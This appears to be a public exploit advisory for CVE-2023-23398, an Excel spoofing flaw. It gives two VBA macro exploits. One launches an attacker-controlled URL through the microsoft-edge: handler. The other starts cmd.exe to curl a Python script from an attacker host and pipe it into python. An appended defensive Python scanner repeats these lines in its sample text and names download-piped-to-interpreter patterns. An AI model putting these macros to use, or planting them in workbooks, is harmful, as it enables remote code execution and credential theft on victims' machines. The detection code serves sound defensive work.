Microsoft Excel Spoofing
Microsoft Excel suffers from a spoofing vulnerability.
## Title: Microsoft Excel Spoofing Vulnerability
## Author: nu11secur1ty
## Date: 04.06.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://www.rapid7.com/fundamentals/spoofing-attacks/
## CVE-2023-23398

## Description:
The attack itself is carried out locally by a user with authentication
to the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open
a specially crafted file from a website, which could lead to a local
attack on the victim's computer. The attacker can trick the victim into
opening a malicious web page by using a malicious Excel file, and can
then steal credentials and bank account information, and sniff and track
all of the victim's traffic without interruption, depending on the
scenario.

STATUS: HIGH Vulnerability

[+] Exploit:

```vbs
' Macro opens the attacker-controlled URL through the microsoft-edge: protocol handler
Sub Check_your_salaries()
CreateObject("Shell.Application").ShellExecute "microsoft-edge:http://192.168.100.96/"
End Sub
```

[+] The victim Exploit + Curl Piping:

## WARNING:
The exploit server must be STREAMING at the moment when the victim hits
the button of the exploit!

```vbs
' Macro starts cmd.exe, fetches a script with curl and pipes it to python
Sub silno_chukane()
    Call Shell("cmd.exe /S /c" & "curl -s http://192.168.100.96/PoC/PoC.py | python", vbNormalFocus)
End Sub
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23398)

## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23398)
[href](https://www.rapid7.com/fundamentals/spoofing-attacks/)

## Proof and Exploit
[href](https://streamable.com/n5qp4q)

## Proof and Exploit
[href](https://streamable.com/u2wxzz)

## Time spent:
01:37:00
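A defender-side check for the two macro patterns in the advisory above, as an added example that is not part of the original advisory: it scans VBA source text that has already been extracted from a workbook and flags procedures that pair a process-launch call with either a protocol-handler URL or a download piped into another program. The function names, indicator names and sample text are assumptions made for this example; string concatenation and line continuations are folded first because the second macro splits its command line with `&`.

```python
import re

# Constructed sample: macro text modelled on the advisory's two procedures
# (lab address taken from the advisory) plus one benign procedure.
SAMPLE_VBA = '''Sub Check_your_salaries()
CreateObject("Shell.Application").ShellExecute "microsoft-edge:http://192.168.100.96/"
End Sub
Sub silno_chukane()
    Call Shell("cmd.exe /S /c" & "curl -s " & _
        "http://192.168.100.96/PoC/PoC.py | python", vbNormalFocus)
End Sub
Sub Format_totals()
    Range("A1").NumberFormat = "0.00"
End Sub
'''

PROC = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+).*?^\s*End\s+(?:Sub|Function)",
    re.I | re.S | re.M)
EXEC = re.compile(r"\b(?:ShellExecute|Shell)\b", re.I)
INDICATORS = {
    # A non-http scheme wrapping a URL, e.g. "microsoft-edge:http://..."
    "uri-handler-launch": re.compile(r'"(?!https?:)[a-z][a-z0-9+.-]+:https?://', re.I),
    # Download tool whose output is piped to another program. No leading \b:
    # after folding, "/c" & "curl" becomes "/ccurl".
    "download-piped-to-interpreter": re.compile(
        r'(?:curl|wget)(?:\.exe)?\s[^"|]*https?://[^"|]*\|\s*\w+', re.I),
}

def normalise(body):
    """Join VBA line continuations, then fold "a" & "b" into "ab"."""
    body = re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", body)
    return re.sub(r'"\s*&\s*"', "", body)

def scan_macros(source):
    """Return {procedure name: sorted indicator names} for flagged procedures."""
    findings = {}
    for m in PROC.finditer(source):
        body = normalise(m.group(0))
        if not EXEC.search(body):
            continue  # no process-launch primitive in this procedure
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(body))
        if hits:
            findings[m.group(1)] = hits
    return findings

if __name__ == "__main__":
    for proc, hits in scan_macros(SAMPLE_VBA).items():
        print(proc, "->", ", ".join(hits))
```

Only literal strings are folded, so a command line assembled from variables or `Chr()` calls would need the macro to be evaluated rather than pattern-matched.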
Related news
CVE-2023-23398: Microsoft Excel Spoofing Vulnerability
**Is the Preview Pane an attack vector for this vulnerability?** No, the Preview Pane is not an attack vector.